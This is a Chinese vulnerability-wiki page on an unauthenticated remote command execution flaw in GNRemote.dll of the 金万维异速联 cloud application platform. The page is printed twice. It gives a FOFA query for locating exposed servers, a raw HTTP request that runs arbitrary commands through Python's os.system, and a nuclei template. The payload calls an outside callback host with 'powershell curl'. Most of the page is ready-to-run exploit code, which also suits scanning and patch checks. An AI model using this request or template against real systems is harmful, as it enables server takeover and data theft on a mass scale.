fofamini-wiki

登录白背景

源码

金万维异速联云联应用系统GNRemote存在远程命令执行漏洞

EA一、漏洞简介

金万维异速联E-SoonLink,是国内领先的远程接入、移动办公、应用虚拟化等软件平台，金万维异速联云联应用系统远程命令执行漏洞利用难度极低，可在未登录的状态下直接发送恶意请求包造成利用，可能被蠕虫、黑客组织批量利用，造成海量敏感信息泄漏、服务器失陷。

二、影响版本

云联应用系统

三、资产测绘

fofatitle="云联应用系统接入平台"
特征

四、漏洞复现

GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+akuyfhpxbo.dgrh3.cn HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0

nuclei

id: jinwanwei_GNRemote_rce

info:
  name: jinwanwei_GNRemote_rce
  author: xiaokp7
  severity: critical
  description: 金万维异速联云联应用系统GNRemote.dll 存在远程命令执行漏洞


http:
- raw:
  - |+
    @timeout: 30s
    GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+{{interactsh-url}} HTTP/1.1
    Host: {{Hostname}}
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip, deflate
    Priority: u=0, i
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0


  matchers:
    - type: word
      part: interactsh_protocol # Confirms the DNS Interaction
      words:
        - "dns"

# Generated From WebFuzzer on 2024-04-18 09:43:10

原文: https://www.yuque.com/xiaokp7/ocvun2/pvkd35vlw3nk8f3m

# 金万维异速联云联应用系统GNRemote存在远程命令执行漏洞

# EA一、漏洞简介
金万维异速联E-SoonLink,是国内领先的远程接入、移动办公、应用虚拟化等软件平台，金万维异速联云联应用系统远程命令执行漏洞利用难度极低，可在未登录的状态下直接发送恶意请求包造成利用，可能被蠕虫、黑客组织批量利用，造成海量敏感信息泄漏、服务器失陷。

# 二、影响版本
+ 云联应用系统

# 三、资产测绘
+ fofa`title="云联应用系统接入平台"`
+ 特征

![1721738019538-968d1085-4b99-4abe-8ecd-f44514e6140f.png](./img/DFcoZ383SDH3U572/1721738019538-968d1085-4b99-4abe-8ecd-f44514e6140f-035524.png)

# 四、漏洞复现
```java
GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+akuyfhpxbo.dgrh3.cn HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0

```

![1721738048615-a572b4b5-119a-431f-9612-1c1fa693aec7.png](./img/DFcoZ383SDH3U572/1721738048615-a572b4b5-119a-431f-9612-1c1fa693aec7-944948.png)

nuclei

```java
id: jinwanwei_GNRemote_rce

info:
  name: jinwanwei_GNRemote_rce
  author: xiaokp7
  severity: critical
  description: 金万维异速联云联应用系统GNRemote.dll 存在远程命令执行漏洞

http:
- raw:
  - |+
    @timeout: 30s
    GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+{{interactsh-url}} HTTP/1.1
    Host: {{Hostname}}
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip, deflate
    Priority: u=0, i
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0

matchers:
    - type: word
      part: interactsh_protocol # Confirms the DNS Interaction
      words:
        - "dns"

# Generated From WebFuzzer on 2024-04-18 09:43:10
```

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pvkd35vlw3nk8f3m>